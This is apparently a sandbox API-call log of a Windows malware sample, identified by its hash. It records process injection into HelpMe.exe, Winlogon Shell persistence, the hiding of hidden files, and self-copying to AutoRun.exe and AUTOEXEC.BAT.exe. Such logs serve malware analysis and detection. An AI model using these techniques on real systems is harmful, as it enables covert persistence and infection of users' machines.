"20190111212121.401","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","process","WinExec","SUCCESS","","lpCmdLine->C:\WINDOWS\system32\HelpMe.exe"
"20190111212121.401","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000a0","nNumberOfBytesToRead->268"
"20190111212121.401","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","CreateFileW","SUCCESS","0x000000a4","lpFileName->C:\DOCUME~1\JANETT~1\LOCALS~1\Temp\\MZ
","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190111212121.401","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","memory","VirtualAllocEx","SUCCESS","0x00154000","th32ProcessID->1400","szExeFile->HelpMe.exe","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190111212121.401","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000a0","nNumberOfBytesToRead->61440"
"20190111212121.401","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","WriteFile","SUCCESS","","hFile->0x000000a4","nNumberOfBytesToWrite->61440"
"20190111212121.401","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000a0","nNumberOfBytesToRead->61440"
"20190111212121.401","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","WriteFile","SUCCESS","","hFile->0x000000a4","nNumberOfBytesToWrite->61440"
"20190111212121.401","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000a0","nNumberOfBytesToRead->61440"
"20190111212121.401","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","WriteFile","SUCCESS","","hFile->0x000000a4","nNumberOfBytesToWrite->61440"
"20190111212121.401","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000a0","nNumberOfBytesToRead->61440"
"20190111212121.421","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x00000098","hKey->0x000000c0","lpSubKey->Software\Microsoft\Windows\CurrentVersion\ThemeManager"
"20190111212121.421","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","FAILURE","","hKey->0x00000098","lpValueName->Compositing"
"20190111212121.421","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x00000098","hKey->0x000000c0","lpSubKey->Control Panel\Desktop"
"20190111212121.421","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","FAILURE","","hKey->0x00000098","lpValueName->LameButtonText"
"20190111212121.421","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","system","LoadLibraryA","SUCCESS","0x5ad70000","lpFileName->uxtheme.dll"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","process","CreateRemoteThread","SUCCESS","0x000000c0","lpStartAddress->0x00404008","th32ProcessID->1400","szExeFile->HelpMe.exe"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","process","CreateRemoteThread","SUCCESS","0x000000c4","lpStartAddress->0x00404008","th32ProcessID->1400","szExeFile->HelpMe.exe"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegCreateKeyExW","SUCCESS","0x000000d0","hKey->HKEY_LOCAL_MACHINE","lpSubKey->SoftWare\Microsoft\Windows NT\CurrentVersion\Winlogon"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegSetValueExA","SUCCESS","","hKey->0x000000d0","lpValueName->Shell","dwType->1","lpData->Explorer.exe  HelpMe.exe","cbData->25"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegCreateKeyExW","SUCCESS","0x000000d4","hKey->HKEY_LOCAL_MACHINE","lpSubKey->SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegSetValueExA","SUCCESS","","hKey->0x000000d4","lpValueName->CheckedValue","dwType->4","lpData->0","cbData->4"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegCreateKeyExW","SUCCESS","0x000000dc","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000dc","lpValueName->Startup"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegCreateKeyExW","SUCCESS","0x000000dc","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegSetValueExW","SUCCESS","","hKey->0x000000dc","lpValueName->Startup","dwType->1","lpData->C:\Documents and Settings\janettedoe\Start Menu\Programs\Startup","cbData->130"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","system","LoadLibraryA","SUCCESS","0x774e0000","lpFileName->ole32.dll"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x000000e0","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","FAILURE","","hKey->0x000000e0","lpValueName->NoNetHood"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x000000e0","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","FAILURE","","hKey->0x000000e0","lpValueName->NoPropertiesMyComputer"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x000000e0","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","FAILURE","","hKey->0x000000e0","lpValueName->NoInternetIcon"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExA","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x000000e0","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","FAILURE","","hKey->0x000000e0","lpValueName->NoCommonGroups"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExA","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{20D04FE0-3AEA-1069-A2D8-08002B30309D}"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x000000e0","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","FAILURE","","hKey->0x000000e0","lpValueName->NoControlPanel"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x000000e0","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","FAILURE","","hKey->0x000000e0","lpValueName->NoSetFolders"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExA","SUCCESS","0x000000e2","hKey->HKEY_CLASSES_ROOT","lpSubKey->CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000e2","lpValueName->(null)"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x000000e8","hKey->HKEY_LOCAL_MACHINE","lpSubKey->System\Setup"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000e8","lpValueName->SystemSetupInProgress"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->SYSTEM\CurrentControlSet\Control\MiniNT"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x000000e8","hKey->HKEY_LOCAL_MACHINE","lpSubKey->System\WPA\PnP"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000e8","lpValueName->seed"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x000000e8","hKey->HKEY_LOCAL_MACHINE","lpSubKey->SYSTEM\Setup"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000e8","lpValueName->OsLoaderPath"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000e8","lpValueName->OsLoaderPath"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x000000e8","hKey->HKEY_LOCAL_MACHINE","lpSubKey->SYSTEM\Setup"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000e8","lpValueName->SystemPartition"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000e8","lpValueName->SystemPartition"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x000000e8","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Setup"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000e8","lpValueName->SourcePath"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000e8","lpValueName->SourcePath"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x000000e8","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Setup"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000e8","lpValueName->ServicePackSourcePath"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000e8","lpValueName->ServicePackSourcePath"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x000000e8","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Setup"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000e8","lpValueName->ServicePackCachePath"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000e8","lpValueName->ServicePackCachePath"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x000000e8","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Setup"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000e8","lpValueName->DriverCachePath"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000e8","lpValueName->DriverCachePath"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x000000e8","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000e8","lpValueName->DevicePath"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","synchronization","CreateMutexW","SUCCESS","0x000000e4","lpName->(null)"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","synchronization","CreateMutexW","SUCCESS","0x000000f0","lpName->(null)"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","synchronization","CreateMutexW","SUCCESS","0x000000f8","lpName->(null)"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x000000fc","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Setup"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000fc","lpValueName->LogLevel"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000fc","lpValueName->LogLevel"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","FAILURE","","hKey->0x000000fc","lpValueName->LogPath"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","FAILURE","","hKey->0x000000fc","lpSubKey->AppLogLevels"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","system","LoadLibraryA","SUCCESS","0x77920000","lpFileName->SETUPAPI.dll"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Rpc\PagedBuffers"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExA","SUCCESS","0x000000fc","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Rpc"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d\RpcThreadPoolThrottle"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Policies\Microsoft\Windows NT\Rpc"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","system","LoadLibraryW","SUCCESS","0x77e70000","lpFileName->rpcrt4.dll"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","CreateFileW","SUCCESS","0x00000120","lpFileName->\\.\PIPE\lsarpc","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","CreateFileW","SUCCESS","0x000000cc","lpFileName->C:\9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","dwDesiredAccess->GENERIC_READ"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000cc","nNumberOfBytesToRead->65536"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","WriteFile","SUCCESS","","hFile->0x00000128","nNumberOfBytesToWrite->65536"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000cc","nNumberOfBytesToRead->65536"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","WriteFile","SUCCESS","","hFile->0x00000128","nNumberOfBytesToWrite->65536"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000cc","nNumberOfBytesToRead->65536"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","WriteFile","SUCCESS","","hFile->0x00000128","nNumberOfBytesToWrite->65536"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000cc","nNumberOfBytesToRead->65536"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","WriteFile","SUCCESS","","hFile->0x00000128","nNumberOfBytesToWrite->65536"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000cc","nNumberOfBytesToRead->65536"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","WriteFile","SUCCESS","","hFile->0x00000128","nNumberOfBytesToWrite->65536"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000cc","nNumberOfBytesToRead->65536"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","WriteFile","SUCCESS","","hFile->0x00000128","nNumberOfBytesToWrite->65536"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000cc","nNumberOfBytesToRead->65536"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","WriteFile","SUCCESS","","hFile->0x00000128","nNumberOfBytesToWrite->20342"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000cc","nNumberOfBytesToRead->65536"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","CopyFileExW","SUCCESS","","lpExistingFileName->C:\9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","lpNewFileName->C:\AutoRun.exe"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","CreateFileW","SUCCESS","0x000000cc","lpFileName->C:\9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","dwDesiredAccess->GENERIC_READ"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000cc","nNumberOfBytesToRead->268"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","CreateFileW","SUCCESS","0x000000cc","lpFileName->C:\AUTOEXEC.BAT","dwDesiredAccess->GENERIC_READ"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000cc","nNumberOfBytesToRead->268"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","CreateFileW","SUCCESS","0x000000cc","lpFileName->C:\9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","dwDesiredAccess->GENERIC_READ"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","CreateFileW","SUCCESS","0x0000012c","lpFileName->C:\AUTOEXEC.BAT","dwDesiredAccess->GENERIC_READ"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","CreateFileW","SUCCESS","0x00000130","lpFileName->C:\AUTOEXEC.BAT.exe","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","CreateFileW","SUCCESS","0x0000011c","lpFileName->\\.\PIPE\lsarpc","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","device","DeviceIoControl","SUCCESS","","hDevice->0x00000124","dwIoControlCode->0x004d0008","lpInBuffer->0x00000000","nInBufferSize->0x00000000","lpOutBuffer->0x0120f37c","nOutBufferSize->0x00000208","lpBytesReturned->0x0120f374","lpOverlapped->0x00000000"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","CreateFileW","SUCCESS","0x00000124","lpFileName->\\.\MountPointManager","dwDesiredAccess->ATTRIBUTES"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","device","DeviceIoControl","FAILURE","","hDevice->0x00000124","dwIoControlCode->0x006d0008","lpInBuffer->0x0049bb00","nInBufferSize->0x00000046","lpOutBuffer->0x00498780","nOutBufferSize->0x00000020","lpBytesReturned->0x0120f374","lpOverlapped->0x00000000"
